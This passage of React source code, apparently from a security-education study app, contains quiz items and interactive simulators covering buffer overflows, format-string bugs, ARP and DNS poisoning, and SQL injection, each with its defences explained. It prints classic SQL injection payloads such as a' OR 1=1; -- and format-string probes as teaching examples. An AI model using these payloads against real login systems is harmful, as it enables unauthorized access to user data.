      {q:"What is the fix for SQL injection?", a:"Parameterized queries (prepared statements): user input is passed as a separate parameter, never interpreted as SQL syntax."},
      {q:"How does admin'; # bypass SQL authentication?", a:"Closes the string after 'admin'. The # character starts a comment, removing the rest of the query including the password comparison."},
    ],
    mcqs:[
      {q:"XSS exploits the fact that:", opts:["SQL lacks prepared statements","The server embeds unsanitized user input in HTML served to other users","Cookies are not encrypted","DNS can be spoofed"], ans:1, explain:"XSS works when a server takes user input and places it directly in an HTML page without sanitization, allowing scripts to reach other users' browsers."},
      {q:"The SQL payload a' OR 1=1; -- works by:", opts:["Dropping all tables","Making the WHERE clause always true and commenting out the password check","Creating a new admin account","Encrypting the query result"], ans:1, explain:"OR 1=1 is always true so all rows match. -- (double dash) comments out everything after it, including the AND Password='...' check."},
      {q:"Clickjacking is mitigated by:", opts:["DNSSEC","Parameterized queries","X-Frame-Options: DENY HTTP header","Encrypting cookies"], ans:2, explain:"X-Frame-Options tells browsers not to render the page inside an iframe, preventing the invisible overlay technique."},
      {q:"A session replay attack differs from basic session hijacking in that:", opts:["It uses brute force","It reuses a previously captured token rather than a current one","It requires SQL injection first","It modifies the session ID"], ans:1, explain:"Replay uses an old (previously valid) token. Basic hijacking steals and immediately uses the current token."},
      {q:"The best defense against SQL injection is:", opts:["Input length limits","Escaping single quotes only","Parameterized queries / prepared statements","HTTPS"], ans:2, explain:"Parameterized queries pass user input as a parameter separate from the query structure. User input cannot be interpreted as SQL syntax regardless of what it contains."},
    ],
    fillBlanks:[
      {t:"XSS is prevented by ___ all user input before embedding it in HTML, stripping characters like < > and quotes.", blanks:["sanitizing/escaping"], hint:"Cleaning the input"},
      {t:"The SQL injection technique that makes the WHERE clause always true uses the condition ___ .", blanks:["OR 1=1"], hint:"Always-true condition"},
      {t:"Clickjacking is prevented by the HTTP response header ___ set to DENY.", blanks:["X-Frame-Options"], hint:"The framing header"},
      {t:"Session tokens must be ___ and rotated frequently to prevent replay and prediction attacks.", blanks:["random"], hint:"Unpredictable"},
    ],
  },
];

/* ═══════════════════════════════════════════════════════════════
   INTERACTIVE DEMOS
═══════════════════════════════════════════════════════════════ */

// Buffer Overflow Stack Visualizer
const StackVisualizer = () => {
  const [input, setInput] = useState("");
  const bufSize = 8;
  const cells = [];
  for (let i = 0; i < bufSize; i++) cells.push(input[i] || null);
  const overflowBytes = input.slice(bufSize);
  const ebpOverflowed = overflowBytes.length >= 4;
  const retOverflowed = overflowBytes.length >= 8;
  const shellcodeInjected = overflowBytes.length >= 12;

  return (
    <div style={{background:"#0a0a0a",border:"1px solid #1e1e1e",borderRadius:12,padding:20,marginTop:16}}>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#555",marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>🔬 Stack Visualizer</div>
      <input value={input} onChange={e=>setInput(e.target.value)} maxLength={24}
        placeholder="Type input here (buffer = 8 chars)..."
        style={{width:"100%",background:"#111",border:"1px solid #333",color:"#e0d8c8",padding:"10px 14px",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:13,marginBottom:16}}/>
      <div style={{display:"flex",flexDirection:"column",gap:4}}>
        {[
          {label:"buffer[0-7]",content:cells.map((c,i)=><span key={i} style={{display:"inline-block",width:20,textAlign:"center",color:c?"#ff3b5c":"#333",background:c?"#1a0306":"transparent",borderRadius:3,padding:"1px 2px",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>{c||"·"}</span>), overflow:input.length>bufSize, color:"#ff3b5c"},
          {label:"Stack Frame Ptr (EBP)",content:<span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:ebpOverflowed?"#ff8c00":"#444"}}>{ebpOverflowed?`OVERWRITTEN: ${overflowBytes.slice(0,4)}`:"0xbfffea48"}</span>, overflow:ebpOverflowed, color:"#ff8c00"},
          {label:"Return Address",content:<span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:retOverflowed?"#f00":"#444"}}>{retOverflowed?`⚠ HIJACKED: ${overflowBytes.slice(4,8)}`:"0x08048xxx"}</span>, overflow:retOverflowed, color:"#f00"},
          {label:"Parameters",content:<span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#333"}}>argv[1] ptr</span>, overflow:false, color:"#555"},
        ].map((row,i)=>(
          <div key={i} style={{display:"flex",alignItems:"center",gap:10,background:row.overflow?"#1a0004":"#0f0f0f",border:`1px solid ${row.overflow?row.color+"55":"#1a1a1a"}`,borderRadius:8,padding:"8px 12px",transition:"all 0.2s"}}>
            <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444",minWidth:160}}>{row.label}</span>
            <div style={{flex:1}}>{row.content}</div>
            {row.overflow&&<span style={{fontSize:11,color:row.color,fontFamily:"'IBM Plex Mono',monospace"}}>← OVERFLOW</span>}
          </div>
        ))}
      </div>
      {retOverflowed&&<div style={{marginTop:12,padding:"10px 14px",background:"#1a0004",border:"1px solid #ff000044",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#f87171"}} className="pop">⚠ Return address overwritten! Execution will jump to attacker-controlled address on function return.</div>}
      <div style={{marginTop:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333"}}>Buffer size: 8 bytes · Current input: {input.length} bytes {input.length>bufSize?`(${input.length-bufSize} overflow)`:""}</div>
    </div>
  );
};

// Format String Attack Demo
const FormatStringDemo = () => {
  const [fmt, setFmt] = useState("");
  const fakeStack = [0x63, 0xf7fb4580, 0x80491c6, 0x0, 0x11223344, 0x252e7825, 0x78252e78, 0x2e78252e];
  
  const simulate = (f) => {
    let out = ""; let stackIdx = 0; let i = 0;
    while (i < f.length && out.length < 200) {
      if (f[i] === "%" && i+1 < f.length) {
        const spec = f[i+1];
        const val = fakeStack[stackIdx] ?? 0xdeadbeef;
        if (spec==="x") { out += val.toString(16); stackIdx++; i+=2; }
        else if (spec==="d") { out += val; stackIdx++; i+=2; }
        else if (spec==="p") { out += "0x"+val.toString(16); stackIdx++; i+=2; }
        else if (spec==="s") { out += stackIdx===4?"[SECRET:0x11223344]":"(ptr:0x"+val.toString(16)+")"; stackIdx++; i+=2; }
        else if (spec==="n") { out += "[WRITE→0x"+val.toString(16)+"]"; stackIdx++; i+=2; }
        else { out += f[i]; i++; }
      } else { out += f[i]; i++; }
    }
    return out;
  };

  const isDangerous = fmt.includes("%n");
  const leaksSecret = fmt.split("%").filter(p=>p.startsWith("x")||p.startsWith("s")||p.startsWith("p")).length >= 5;

  return (
    <div style={{background:"#0a0800",border:"1px solid #ff8c0033",borderRadius:12,padding:20,marginTop:16}}>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#ff8c00",marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>🔬 Format String Simulator</div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#555",marginBottom:8}}>Fake stack: [0x63, 0xf7fb4580, 0x80491c6, 0x0, <span style={{color:"#ff3b5c"}}>SECRET:0x11223344</span>, ...]</div>
      <input value={fmt} onChange={e=>setFmt(e.target.value)}
        placeholder='Try: %x.%x.%x.%x.%x or %s%s%s%s%s or hello%n'
        style={{width:"100%",background:"#111",border:"1px solid #333",color:"#e0d8c8",padding:"10px 14px",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:13,marginBottom:12}}/>
      {fmt && (
        <div className="fi">
          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#555",marginBottom:6}}>printf("{fmt}") output:</div>
          <div style={{background:"#0d0d0d",border:`1px solid ${isDangerous?"#ff3b5c44":leaksSecret?"#ff8c0044":"#222"}`,borderRadius:8,padding:"12px 14px",fontFamily:"'IBM Plex Mono',monospace",fontSize:14,color:isDangerous?"#f87171":leaksSecret?"#fbbf24":"#a0d8a0",wordBreak:"break-all"}}>
            {simulate(fmt) || "(empty output)"}
          </div>
          {leaksSecret&&<div style={{marginTop:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#ff8c00"}}>⚠ Secret value 0x11223344 leaked from stack!</div>}
          {isDangerous&&<div style={{marginTop:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#f87171"}}>💀 %n detected — writing to arbitrary memory address!</div>}
        </div>
      )}
    </div>
  );
};

// ARP Poisoning Simulator
const ArpPoisonDemo = () => {
  const [step, setStep] = useState(0);
  const steps = [
    {label:"Normal state",desc:"Alice, Bob, and Eve are all on the same LAN. Alice's ARP cache correctly maps Bob's IP to Bob's MAC.",alice:"Bob's IP → Bob's MAC ✓",bob:"Alice's IP → Alice's MAC ✓"},
    {label:"Eve sends forged reply to Alice",desc:"Eve sends an unsolicited ARP reply to Alice: 'Bob's IP is at Eve's MAC'. Alice has no way to verify this — she updates her cache.",alice:"Bob's IP → EVE's MAC ⚠",bob:"Alice's IP → Alice's MAC ✓",event:"Eve → Alice: ARP Reply 'Bob's IP = Eve's MAC'"},
    {label:"Eve sends forged reply to Bob",desc:"Eve also sends a forged ARP reply to Bob: 'Alice's IP is at Eve's MAC'. Bob updates his cache too.",alice:"Bob's IP → Eve's MAC ✗",bob:"Alice's IP → Eve's MAC ✗",event:"Eve → Bob: ARP Reply 'Alice's IP = Eve's MAC'"},
    {label:"MITM achieved",desc:"Now ALL traffic between Alice and Bob routes through Eve. Eve can read, modify, or drop any packet. This is a Man-in-the-Middle attack.",alice:"Bob's IP → Eve's MAC ✗",bob:"Alice's IP → Eve's MAC ✗",mitm:true},
  ];
  const s = steps[step];
  return (
    <div style={{background:"#000a0a",border:"1px solid #00c8ff33",borderRadius:12,padding:20,marginTop:16}}>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#00c8ff",marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>🔬 ARP Poisoning Simulator</div>
      <div style={{display:"flex",gap:8,marginBottom:16}}>
        {steps.map((_,i)=><button key={i} onClick={()=>setStep(i)} style={{flex:1,background:step===i?"#00c8ff22":"#0f0f0f",border:`1px solid ${step===i?"#00c8ff55":"#222"}`,color:step===i?"#00c8ff":"#444",padding:"6px",borderRadius:6,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:11}}>{i+1}</button>)}
      </div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#00c8ff",marginBottom:6}}>{s.label}</div>
      <div style={{fontFamily:"'IBM Plex Mono'",fontSize:12,color:"#888",marginBottom:16,lineHeight:1.6}}>{s.desc}</div>
      {s.event&&<div style={{background:"#1a0d00",border:"1px solid #ff8c0044",borderRadius:8,padding:"8px 12px",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#ff8c00",marginBottom:12}}>📡 {s.event}</div>}
      <div style={{display:"grid",gridTemplateColumns:"1fr 1fr",gap:8}}>
        {[{name:"Alice",cache:s.alice,color:"#4ade80"},{name:"Bob",cache:s.bob,color:"#60a5fa"}].map(p=>(
          <div key={p.name} style={{background:"#0f0f0f",border:`1px solid ${p.color}33`,borderRadius:8,padding:"10px 12px"}}>
            <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:p.color,marginBottom:6}}>{p.name}'s ARP Cache</div>
            <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:p.cache.includes("Eve")?"#f87171":"#888"}}>{p.cache}</div>
          </div>
        ))}
      </div>
      {s.mitm&&<div style={{marginTop:12,padding:"10px 14px",background:"#1a0004",border:"1px solid #f8717144",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#f87171"}} className="pop">💀 MITM Active: Alice→Bob traffic → Eve → Bob. Eve can read/modify all packets.</div>}
    </div>
  );
};

// SQL Injection Demo
const SqlInjectionDemo = () => {
  const [uname, setUname] = useState("");
  const [pwd, setPwd] = useState("");
  const users = [{name:"alice",pwd:"secret123"},{name:"bob",pwd:"hunter2"},{name:"admin",pwd:"superpass"}];

  const buildQuery = () => `SELECT * FROM users WHERE name='${uname}' AND password='${pwd}'`;
  
  const simulate = () => {
    const q = buildQuery().toLowerCase();
    // Check for injection patterns
    if (q.includes("or 1=1") || q.includes("'--") || q.includes("';") || q.includes("' or") || q.includes("'#")) {
      return {success:true,injection:true,user:"ALL USERS (injected!)",rows:users};
    }
    const u = users.find(u=>u.name===uname && u.pwd===pwd);
    if (u) return {success:true,injection:false,user:u.name,rows:[u]};
    return {success:false,injection:false};
  };

  const result = uname ? simulate() : null;
  const isInjection = uname.includes("'") || uname.includes("--") || uname.includes("#");

  return (
    <div style={{background:"#08000f",border:"1px solid #b060ff33",borderRadius:12,padding:20,marginTop:16}}>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#b060ff",marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>🔬 SQL Injection Demo</div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#555",marginBottom:12}}>
        Try: username=<span style={{color:"#ff3b5c"}}>a' OR 1=1; --</span> or <span style={{color:"#ff3b5c"}}>admin'; #</span>
      </div>
      <div style={{display:"flex",flexDirection:"column",gap:8,marginBottom:12}}>
        <input value={uname} onChange={e=>setUname(e.target.value)} placeholder="Username..."
          style={{background:"#111",border:`1px solid ${isInjection?"#ff3b5c55":"#333"}`,color:"#e0d8c8",padding:"10px 14px",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}/>
        <input value={pwd} onChange={e=>setPwd(e.target.value)} placeholder="Password..." type="text"
          style={{background:"#111",border:"1px solid #333",color:"#e0d8c8",padding:"10px 14px",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}/>
      </div>
      <div style={{background:"#0d0d0d",border:"1px solid #222",borderRadius:8,padding:"10px 14px",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#666",marginBottom:12,wordBreak:"break-all"}}>
        <span style={{color:"#444"}}>Query: </span>
        <span style={{color:isInjection?"#ff8c00":"#888"}}>{buildQuery()}</span>
      </div>
      {result && (
        <div className="fi" style={{background:result.injection?"#1a0004":result.success?"#081a0e":"#1a0808",border:`1px solid ${result.injection?"#f8717144":result.success?"#4ade8044":"#f8717144"}`,borderRadius:8,padding:"12px 14px"}}>
          <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:13,color:result.injection?"#f87171":result.success?"#4ade80":"#f87171",marginBottom:result.injection?8:0}}>
            {result.injection?"💀 SQL INJECTION SUCCESSFUL":result.success?`✓ Logged in as: ${result.user}`:"✗ Login failed"}
          </div>
          {result.injection&&result.rows&&<div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#f87171"}}>Returned {result.rows.length} row(s): {result.rows.map(r=>r.name).join(", ")} (all user data exposed!)</div>}
        </div>
      )}
    </div>
  );
};

// DNS Cache Poisoning Visualizer
const DnsDemo = () => {
  const [step, setStep] = useState(0);
  const steps = [
    {label:"User queries DNS",desc:"User's machine asks local DNS resolver for 'bank.com'. Resolver checks its cache — not found. Sends query to authoritative DNS.",cache:"(empty)",event:"User → Resolver: 'What is bank.com?'",txnId:"0x1a4f"},
    {label:"Attacker floods with forged responses",desc:"Attacker sees the query (or triggers one). Floods the resolver with forged DNS responses across all 65,536 possible transaction IDs, hoping one matches.",cache:"(empty)",event:"Attacker → Resolver: 'bank.com = 1.3.3.7' (TxnID: 0x0000–0xFFFF)",attack:true},
    {label:"Forged response accepted",desc:"A forged response arrives with the correct transaction ID before the real one. Resolver caches the attacker's IP for bank.com.",cache:"bank.com → 1.3.3.7 (ATTACKER) ✗",event:"Resolver accepts forged TxnID: 0x1a4f ← MATCHED!",poisoned:true},
    {label:"All users redirected",desc:"Now every user querying this resolver for bank.com gets the attacker's IP. Users browse to attacker's phishing server thinking it's their bank.",cache:"bank.com → 1.3.3.7 (ATTACKER) ✗",event:"User → bank.com → 1.3.3.7 (phishing server!)",poisoned:true,mitm:true},
  ];
  const s = steps[step];
  return (
    <div style={{background:"#00090f",border:"1px solid #00c8ff33",borderRadius:12,padding:20,marginTop:16}}>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#00c8ff",marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>🔬 DNS Cache Poisoning</div>
      <div style={{display:"flex",gap:8,marginBottom:16}}>
        {steps.map((_,i)=><button key={i} onClick={()=>setStep(i)} style={{flex:1,background:step===i?"#00c8ff22":"#0f0f0f",border:`1px solid ${step===i?"#00c8ff55":"#222"}`,color:step===i?"#00c8ff":"#444",padding:"6px",borderRadius:6,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:11}}>{i+1}</button>)}
      </div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#00c8ff",marginBottom:6}}>{s.label}</div>
      <div style={{fontSize:12,color:"#888",lineHeight:1.6,marginBottom:12,fontFamily:"'IBM Plex Mono',monospace"}}>{s.desc}</div>
      <div style={{background:s.attack?"#1a0d00":s.poisoned?"#1a0004":"#0d0d0d",border:`1px solid ${s.attack?"#ff8c0044":s.poisoned?"#f8717144":"#1e1e1e"}`,borderRadius:8,padding:"8px 12px",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:s.attack?"#ff8c00":s.poisoned?"#f87171":"#666",marginBottom:8}}>
        📡 {s.event}
      </div>
      <div style={{display:"flex",alignItems:"center",gap:8}}>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>Resolver Cache:</span>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:s.poisoned?"#f87171":"#555"}}>{s.cache}</span>
      </div>
      {s.mitm&&<div style={{marginTop:12,padding:"10px 14px",background:"#1a0004",border:"1px solid #f8717144",borderRadius:8,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#f87171"}} className="pop">💀 Cache poisoned! {Math.round(Math.random()*1000+500)} users will be redirected to phishing server.</div>}
    </div>
  );
};

const DEMOS = {bof:<StackVisualizer/>, fmt:<FormatStringDemo/>, net:<ArpPoisonDemo/>, web:<SqlInjectionDemo/>, dns_demo:<DnsDemo/>};

/* ═══════════════════════════════════════════════════════════════
   QUIZ ENGINE
═══════════════════════════════════════════════════════════════ */
function shuffle(a){return [...a].sort(()=>Math.random()-0.5);}

const McqQuiz = ({questions,color,onXp,onDone}) => {
  const qs = useRef(shuffle(questions));
  const [idx,setIdx]=useState(0);
  const [sel,setSel]=useState(null);
  const [score,setScore]=useState(0);
  const [results,setResults]=useState([]);
  const q=qs.current[idx];

  const pick=(i)=>{
    if(sel!==null)return;
    const ok=i===q.ans;
    setSel(i);setResults(r=>[...r,ok]);
    if(ok){setScore(s=>s+1);onXp(20);}
  };
  const next=()=>{
    if(idx+1>=qs.current.length)onDone(score+( sel===q.ans?1:0 ),qs.current.length);
    else{setIdx(i=>i+1);setSel(null);}
  };

  return(
    <div className="fu">
      <div style={{display:"flex",justifyContent:"space-between",marginBottom:16}}>
        <div style={{display:"flex",gap:4}}>{qs.current.map((_,i)=><div key={i} style={{width:8,height:8,borderRadius:"50%",background:i<idx?(results[i]?"#4ade80":"#f87171"):i===idx?color:"#1e1e1e"}}/>)}</div>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>{idx+1}/{qs.current.length}</span>
      </div>
      <div style={{background:"#0f0f0f",border:`1px solid ${color}33`,borderRadius:12,padding:"22px 20px",marginBottom:12}}>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:18,color:"#e0d8c8",lineHeight:1.5}}>{q.q}</div>
      </div>
      <div style={{display:"flex",flexDirection:"column",gap:8,marginBottom:12}}>
        {q.opts.map((o,i)=>{
          const revealed=sel!==null,ok=i===q.ans,chosen=sel===i;
          return(
            <button key={i} onClick={()=>pick(i)} style={{background:revealed&&ok?"#081a0e":revealed&&chosen&&!ok?"#1a0808":"#0d0d0d",border:`1px solid ${revealed&&ok?"#4ade80":revealed&&chosen&&!ok?"#f87171":"#1e1e1e"}`,color:revealed&&ok?"#4ade80":revealed&&chosen&&!ok?"#f87171":"#b0a898",padding:"13px 16px",borderRadius:10,textAlign:"left",cursor:sel===null?"pointer":"default",fontFamily:"'DM Sans',sans-serif",fontSize:14,display:"flex",alignItems:"center",gap:12,transition:"all 0.15s"}}>
              <span style={{width:22,height:22,borderRadius:"50%",border:`1px solid currentColor`,display:"flex",alignItems:"center",justifyContent:"center",fontSize:11,fontFamily:"'IBM Plex Mono',monospace",flexShrink:0,opacity:0.6}}>{String.fromCharCode(65+i)}</span>
              {o}
              {revealed&&ok&&<span style={{marginLeft:"auto",fontSize:16}}>✓</span>}
              {revealed&&chosen&&!ok&&<span style={{marginLeft:"auto",fontSize:16}}>✗</span>}
            </button>
          );
        })}
      </div>
      {sel!==null&&(
        <div className="fu">
          <div style={{background:"#0a0a0a",border:"1px solid #1e1e1e",borderRadius:8,padding:"10px 14px",marginBottom:10,fontFamily:"'IBM Plex Mono',monospace",fontSize:12,color:"#666",lineHeight:1.6}}>
            💡 {q.explain}
          </div>
          <button onClick={next} style={{width:"100%",background:`${color}18`,border:`1px solid ${color}44`,color,padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>
            {idx+1>=qs.current.length?"See Results →":"Next →"}
          </button>
        </div>
      )}
    </div>
  );
};

const FlashcardQuiz = ({cards,color,onXp,onDone}) => {
  const deck=useRef(shuffle(cards));
  const [idx,setIdx]=useState(0);
  const [flipped,setFlipped]=useState(false);
  const [score,setScore]=useState(0);
  const card=deck.current[idx];

  const answer=(ok)=>{
    if(ok){setScore(s=>s+1);onXp(15);}
    if(idx+1>=deck.current.length)onDone(ok?score+1:score,deck.current.length);
    else{setIdx(i=>i+1);setFlipped(false);}
  };

  return(
    <div className="fu">
      <div style={{display:"flex",justifyContent:"space-between",marginBottom:16}}>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>Card {idx+1}/{deck.current.length}</span>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>Score: {score}</span>
      </div>
      <div onClick={()=>setFlipped(f=>!f)} style={{background:"#0f0f0f",border:`2px solid ${flipped?color+"66":color+"33"}`,borderRadius:14,minHeight:180,padding:"28px 24px",cursor:"pointer",transition:"all 0.2s",display:"flex",flexDirection:"column",justifyContent:"center",marginBottom:12}}>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:flipped?color:"#444",textTransform:"uppercase",letterSpacing:2,marginBottom:14}}>{flipped?"Answer":"Question — tap to flip"}</div>
        <div style={{fontFamily:flipped?"'DM Sans',sans-serif":"'DM Serif Display',serif",fontSize:flipped?14:18,color:"#e0d8c8",lineHeight:1.6}}>{flipped?card.a:card.q}</div>
      </div>
      {flipped&&(
        <div style={{display:"flex",gap:8}} className="fu">
          <button onClick={()=>answer(false)} style={{flex:1,background:"#1a0808",border:"1px solid #f8717144",color:"#f87171",padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>✗ Missed</button>
          <button onClick={()=>answer(true)} style={{flex:1,background:"#081a0e",border:"1px solid #4ade8044",color:"#4ade80",padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>✓ Got it</button>
        </div>
      )}
    </div>
  );
};

const FillBlankQuiz = ({questions,color,onXp,onDone}) => {
  const qs=useRef(shuffle(questions));
  const [idx,setIdx]=useState(0);
  const [inputs,setInputs]=useState([]);
  const [status,setStatus]=useState(null);
  const [score,setScore]=useState(0);
  const q=qs.current[idx];

  useEffect(()=>{setInputs(new Array((q.blanks||[]).length).fill(""));},[idx]);

  const check=()=>{
    const norm=s=>s.trim().toLowerCase().replace(/[^a-z0-9%/\-_]/g,"");
    const allOk=(q.blanks||[]).every((b,i)=>norm(inputs[i]||"")===norm(b));
    setStatus(allOk?"correct":"wrong");
    if(allOk){setScore(s=>s+1);onXp(20);}
  };
  const next=()=>{
    if(idx+1>=qs.current.length)onDone(score+(status==="correct"?1:0),qs.current.length);
    else{setIdx(i=>i+1);setStatus(null);}
  };

  const parts=q.t.split("___");

  return(
    <div className="fu">
      <div style={{display:"flex",justifyContent:"space-between",marginBottom:16}}>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>{idx+1}/{qs.current.length}</span>
        <span style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#444"}}>Score: {score}</span>
      </div>
      <div style={{background:"#0f0f0f",border:`1px solid ${color}33`,borderRadius:12,padding:"22px 20px",marginBottom:14}}>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:color,marginBottom:12,textTransform:"uppercase",letterSpacing:2}}>Fill in the blank</div>
        <div style={{fontSize:15,color:"#d0c8b8",lineHeight:1.9,fontFamily:"'DM Serif Display',serif"}}>
          {parts.map((part,i)=>(
            <span key={i}>{part}{i<parts.length-1&&(
              status?(
                <span style={{borderBottom:`2px solid ${status==="correct"?"#4ade80":"#f87171"}`,padding:"2px 8px",color:status==="correct"?"#4ade80":"#f87171",fontFamily:"'IBM Plex Mono',monospace",fontSize:14,margin:"0 3px"}}>{q.blanks[i]}</span>
              ):(
                <input value={inputs[i]||""} onChange={e=>{const n=[...inputs];n[i]=e.target.value;setInputs(n);}}
                  onKeyDown={e=>e.key==="Enter"&&check()}
                  style={{border:"none",borderBottom:`2px solid ${color}66`,background:"transparent",color,fontFamily:"'IBM Plex Mono',monospace",fontSize:14,padding:"2px 6px",width:120,margin:"0 3px",outline:"none"}}/>
              )
            )}</span>
          ))}
        </div>
        <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:11,color:"#333",marginTop:10}}>💡 {q.hint}</div>
      </div>
      {status===null?(
        <button onClick={check} disabled={inputs.every(i=>!i.trim())} style={{width:"100%",background:`${color}18`,border:`1px solid ${color}44`,color,padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>Check ↵</button>
      ):(
        <div className="fu">
          <div style={{background:status==="correct"?"#081a0e":"#1a0808",border:`1px solid ${status==="correct"?"#4ade8044":"#f8717144"}`,borderRadius:8,padding:"10px 14px",fontFamily:"'IBM Plex Mono',monospace",fontSize:13,color:status==="correct"?"#4ade80":"#f87171",marginBottom:10}}>
            {status==="correct"?"✓ Correct!":"✗ Check the answers above"}
          </div>
          <button onClick={next} style={{width:"100%",background:`${color}18`,border:`1px solid ${color}44`,color,padding:12,borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>
            {idx+1>=qs.current.length?"See Results →":"Next →"}
          </button>
        </div>
      )}
    </div>
  );
};

const ResultScreen = ({score,total,color,onRetry,onBack}) => {
  const pct=Math.round(score/total*100);
  return(
    <div style={{textAlign:"center",padding:"48px 16px"}} className="pop">
      <div style={{fontSize:56,marginBottom:12}}>{pct>=80?"🎯":pct>=60?"📚":"💪"}</div>
      <div style={{fontFamily:"'DM Serif Display',serif",fontSize:38,color:"#e0d8c8",marginBottom:6}}>{score}/{total}</div>
      <div style={{fontFamily:"'IBM Plex Mono',monospace",fontSize:13,color:pct>=80?"#4ade80":pct>=60?"#fbbf24":"#f87171",marginBottom:28}}>
        {pct}% — {pct>=80?"Solid grasp.":pct>=60?"Getting there.":"Hit the notes again."}
      </div>
      <div style={{display:"flex",gap:10,justifyContent:"center"}}>
        <button onClick={onRetry} style={{background:`${color}18`,border:`1px solid ${color}44`,color,padding:"10px 20px",borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>↺ Retry</button>
        <button onClick={onBack} style={{background:"#111",border:"1px solid #222",color:"#666",padding:"10px 20px",borderRadius:10,cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:13}}>← Back</button>
      </div>
    </div>
  );
};

/* ═══════════════════════════════════════════════════════════════
   TOPIC DEEP-DIVE PAGE
═══════════════════════════════════════════════════════════════ */
const TopicPage = ({topic,xp,addXp,onBack}) => {
  const [tab,setTab]=useState("notes");
  const [quizMode,setQuizMode]=useState(null);
  const [quizResult,setQuizResult]=useState(null);
  const [expandedSection,setExpandedSection]=useState(0);

  const tabs=[
    {id:"notes",label:"Notes",icon:"📖"},
    {id:"demo",label:"Interactive",icon:"🔬"},
    {id:"flash",label:"Flashcards",icon:"🃏"},
    {id:"mcq",label:"MCQ",icon:"✏️"},
    {id:"fill",label:"Fill Blank",icon:"📝"},
  ];

  const demoMap = {
    bof:<StackVisualizer/>,
    fmt:<FormatStringDemo/>,
    net:<><ArpPoisonDemo/><DnsDemo/></>,
    web:<SqlInjectionDemo/>,
    cra:<div style={{background:"#0c0e00",border:"1px solid #c8e60022",borderRadius:12,padding:20,fontFamily:"'IBM Plex Mono',monospace",fontSize:13,color:"#888",marginTop:16}}>💡 No live demo for code reuse (requires native execution). Study the stack diagrams in notes and review the return-to-libc task breakdown.</div>,
  };

  const handleDone=(s,t)=>setQuizResult({score:s,total:t});

  return(
    <div className="fu">
      <button onClick={onBack} style={{background:"none",border:"none",color:"#444",cursor:"pointer",fontFamily:"'IBM Plex Mono',monospace",fontSize:12,marginBottom:20,display:"flex",alignItems:"center",gap:6}}>
        ← all topics
      </button>

      <div style={{display:"flex",alignItems:"center",gap:14,marginBottom:20}}>
        <div style={{width:44,height:44,borderRadius:12,background:topic.bg,border:`1px solid ${topic.color}44`,display:"flex",alignItems:"center",justifyContent:"center",fontSize:22}}>{topic.icon}</div>
        <div>
          <div style={{fontFamily:"'DM Serif Display',serif",fontSize:24,color:"#e0d8c8"}}>{topic.title}</div>
